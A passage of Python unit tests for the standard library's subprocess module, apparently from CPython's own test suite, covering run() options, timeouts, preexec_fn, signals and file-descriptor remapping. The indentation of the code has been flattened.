('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any argumenets that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
